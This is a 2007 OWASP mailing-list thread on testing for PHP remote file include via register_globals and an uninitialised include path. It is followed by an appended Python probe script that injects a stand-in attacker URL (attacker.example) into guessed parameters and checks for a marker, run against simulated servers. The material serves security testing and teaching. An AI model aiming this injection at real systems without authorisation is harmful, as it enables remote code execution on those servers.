[Owasp-testing] Remote File include vulnerability
David.Byrne at echostar.com
Tue Apr 10 13:25:39 EDT 2007
In my experience, you usually need the source code to do this. The idea
is that on some platforms (mostly PHP), script files can be included at
include($base_path . "/utils.php");
If register_globals is enabled (older versions of PHP enable it by
default), and base_path is never initialized in the script, base_path
can be set from the URL
This will run the attack PHP file on the victim web server. I've seen
this happen mostly on files that are not intended to be called alone.
For example, a utility library that usually gets included after a
configuration file that sets base_path.
I don't know of effective methods for testing this without access to the
code. I suppose a particularly poorly written app might have a path in
the URL query by design, which could then be modified. You could also
try to use common variable names (like base_path), although you would
still have to find a vulnerable script which is probably never called
directly by a browser.
From: owasp-testing-bounces at lists.owasp.org
[mailto:owasp-testing-bounces at lists.owasp.org] On Behalf Of Denise
Sent: Tuesday, April 10, 2007 10:45 AM
Subject: [Owasp-testing] Remote File include vulnerability
Hi to all,
Can someone please tell me, how to carry out penetration
testing for Remote File Include Vulnerability?
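The probing approach David describes (guessing common variable names such as base_path and pointing them at an attacker-hosted file) can be scripted. The following is an added example, not code from the original post or from OWASP: the victim URL, the attacker host, the marker token, the candidate parameter list and the stand-in "server" are all assumptions constructed for the demonstration. It relies on one standard PHP detail not in the post: with allow_url_include on, a trailing "?" in the injected value turns whatever the script concatenates after the variable (here "/utils.php") into a query string on the attacker's server, so the file actually fetched is still the attacker's. Detection keys on a marker the hosted file would emit, not on the attacker URL itself, so a server that merely reflects the parameter back in a warning does not count as a hit.

```python
"""Probe a target script for a register_globals-style remote file include
by injecting candidate parameter names and looking for a marker string.

Added example for the mailing-list thread above, not original code.
Everything below (target, attacker host, marker, candidate names, fake
server) is constructed for the demonstration.
"""
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Token the attacker-hosted file would print if it were really included.
# It must not appear in the probe URL, so reflection of the parameter
# (e.g. in a PHP "failed to open stream" warning) cannot cause a hit.
MARKER = "RFI-PROBE-7f3a9c"
ATTACKER_FILE = "http://attacker.example/m.txt"   # assumed attacker host
CANDIDATE_NAMES = [
    "base_path", "path", "dir", "root", "include",
    "inc", "page", "file", "template", "lib",
]


def build_probe_url(target, name, attacker_file=ATTACKER_FILE):
    """Return target with ?name=<attacker_file>? appended.

    Existing query parameters are preserved.  The trailing '?' makes
    PHP request attacker_file?/utils.php, i.e. the attacker's file with
    the script's appended suffix demoted to a harmless query string.
    """
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    query[name] = [attacker_file + "?"]
    new_query = urlencode(query, doseq=True)
    return urlunsplit((parts.scheme, parts.netloc, parts.path,
                       new_query, parts.fragment))


def probe(target, fetch_fn, names=CANDIDATE_NAMES, marker=MARKER):
    """Try each candidate name; return the names whose injection made
    the marker show up in the response body.

    fetch_fn(url) -> str is injected so the logic can be exercised
    offline; for a real engagement pass a function that performs the
    HTTP GET (e.g. with requests) against a host you are authorised
    to test.
    """
    baseline = fetch_fn(target)
    if marker in baseline:
        raise ValueError("marker already present in baseline page; "
                         "choose a different marker")
    hits = []
    for name in names:
        body = fetch_fn(build_probe_url(target, name))
        if marker in body:
            hits.append(name)
    return hits


def fake_vulnerable_server(url):
    """Constructed stand-in for a PHP host with register_globals on,
    whose utils.php does include($base_path . "/utils.php") without
    ever initialising $base_path.  Other parameters are only echoed in
    a debug line, which is reflection rather than inclusion.
    """
    params = parse_qs(urlsplit(url).query)
    body = "<html>utils loaded</html>\n"
    base_path = params.get("base_path", [""])[0]
    if base_path.startswith(ATTACKER_FILE):
        # Simulates allow_url_include fetching and running the remote
        # file: its contents (the marker) end up in the response.
        body += MARKER + "\n"
    elif base_path:
        body += ("Warning: include(%s/utils.php): failed to open stream\n"
                 % base_path)
    for key, values in params.items():
        if key != "base_path":
            body += "debug: %s=%s\n" % (key, values[0])
    return body


def fake_safe_server(url):
    """Constructed stand-in for a host that ignores all parameters."""
    return "<html>utils loaded</html>\n"


if __name__ == "__main__":
    target = "http://victim.example/lib/utils.php"
    print("vulnerable host hits:", probe(target, fake_vulnerable_server))
    print("safe host hits:      ", probe(target, fake_safe_server))
```

As the post notes, the weak spot is usually a library file that is never linked from the site, so the target list for probe() has to come from directory enumeration or the source rather than from crawling; the candidate names are a guess and a miss proves nothing.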